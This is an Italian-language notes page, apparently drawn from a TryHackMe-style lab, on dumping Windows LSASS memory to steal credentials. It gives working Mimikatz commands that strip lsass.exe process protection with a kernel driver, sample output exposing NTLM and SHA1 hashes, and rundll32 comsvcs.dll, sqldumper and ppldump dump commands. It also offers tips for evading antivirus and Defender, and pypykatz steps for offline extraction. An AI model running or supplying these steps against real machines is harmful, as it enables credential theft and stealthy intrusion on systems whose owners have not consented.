Quartz 4

Dumping LSASS (Local Security Authority Subsystem Service)

4 min read

tags: Estrazione_Hash_LSASS LSASS_Process_Extraction Windows_Privilage_Escalation Dumping_LSASS

Per estrarre gli hash dal processo LSASS.exe possiamo utilizzare Mimikatz.

Il comando è il seguente:

sekurlsa::logonpasswords

Ma molto probabilmente ti darà questo errore:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

Che significa che non abbiamo i permessi necessari per eseguire questa operazione, ma Mimikatz ci permette di bypassare questo blocco con due semplici comandi che riporto qui sotto:

 
!+
 
!processprotect /process:lsass.exe /remove

Esempio

 
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
 
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 824 -> 00/00 [0-0-0]
 
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 2603437 (00000000:0027b9ad)
Session           : RemoteInteractive from 3
User Name         : thm
Domain            : THM
Logon Server      : CREDS-HARVESTIN
Logon Time        : 12/5/2025 1:27:16 PM
SID               : S-1-5-21-1966530601-3185510712-10604624-1114
        msv :
         [00000003] Primary
         * Username : thm
         * Domain   : THM
         * NTLM     : fc525c9683e8fe067095ba2ddc971889
         * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
         * DPAPI    : cd09e2e4f70ef660400b8358c52a46b8
        tspkg :
        wdigest :
         * Username : thm
....
....
....

Alle volte è necessario lanciare più volte l’ultimo comando (non mi chiedere perchè).

Presenza dell’Antivirus

Nel caso fosse presente un antivirus utilizzare l’ultimo comando è una pratica molto sconsigliata perchè allerterebbe sicuramente tutti i sistemi di difesa dato che Mimikatz è il malware meglio conosciuto al mondo, quindi usa solo i primi due comandi per togliere il blocco e poi altre tecniche per dumpare il contenuto del processo LSASS.

Metodo 1: comsvcs.dll (Il Re dei LOLBins)

Questo è il metodo più usato dai Red Teamer. Utilizza una DLL nativa di Windows presente in ogni installazione.

Requisiti: Shell con privilegi di Amministratore o SYSTEM.

Trova il PID di LSASS:

 
tasklist | findstr lsass

(Supponiamo che il PID sia 644).

Esegui il dump con rundll32: Attenzione alla sintassi: Questo comando è molto sensibile. Devi scriverlo esattamente così (assicurati di usare un percorso scrivibile come C:\Windows\Temp o C:\Users\Public).

 
# Comando da lanciare in CMD (non PowerShell) come Admin
 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 644 C:\Windows\Temp\lsass.dmp full

Perché è stealth? Stai usando rundll32.exe (legittimo) per chiamare una funzione di comsvcs.dll (legittima). Molti antivirus base non bloccano questa combinazione.

Metodo 2: Task Manager (Se hai accesso grafico/RDP)

Se hai accesso RDP (Remote Desktop) o VNC, questo è paradossalmente uno dei metodi più efficaci perché simula un’azione umana di “debugging”.

Apri Gestione Attività (Task Manager).

Vai nella scheda Dettagli.

Clicca col tasto destro su lsass.exe.

Seleziona Crea file di dump.

Il file verrà salvato in C:\Users<TuoUtente>\AppData\Local\Temp\lsass.DMP.

Perché è stealth? È una funzione nativa di Windows usata dagli amministratori di sistema per risolvere i crash. Defender raramente blocca l’azione manuale dalla GUI.

Metodo 3: SQLDumper (Se presente)

Se sulla macchina (o su un’altra macchina nella rete da cui puoi copiarlo) è installato SQL Server, esiste un tool firmato Microsoft chiamato sqldumper.exe. È potentissimo e gli antivirus lo ignorano quasi sempre.

Cerca se esiste:

dir /s /b C:\sqldumper.exe

(Spesso si trova in C:\Program Files\Microsoft SQL Server…\Shared)

Usa il comando per il dump:

 
# Sintassi: sqldumper.exe <PID_LSASS> 0 0x01100
 
sqldumper.exe 644 0 0x01100

Cosa fare dopo il Dump? (Analisi Offline) Una volta che hai creato il file lsass.dmp (o lsass.DMP) con uno dei metodi sopra, devi portarlo sulla tua macchina Linux.

Comando su Kali:

 
# Installa pypykatz se non ce l'hai
pip3 install pypykatz
 
# Estrai le password dal file dump
pypykatz lsa minidump lsass.dmp

Mimikatz Completamente Bannato

Nel caso Mimikatz fosse completamente bannato e non riuscissimo ad evadere la protezione PPL possiamo usare un altro strumento nel seguente modo (Dopo averlo trasferito sulla macchina vittima):

ppldump.exe lsass.exe lsass.dmp

Se funziona, questo tool farà tre cose in un colpo solo:

  1. Carica il driver vulnerabile.

  2. Disabilita la PPL.

  3. Fa il dump di LSASS nel file .dmp.

  4. Ripristina la protezione (spesso) per pulizia.

Graph View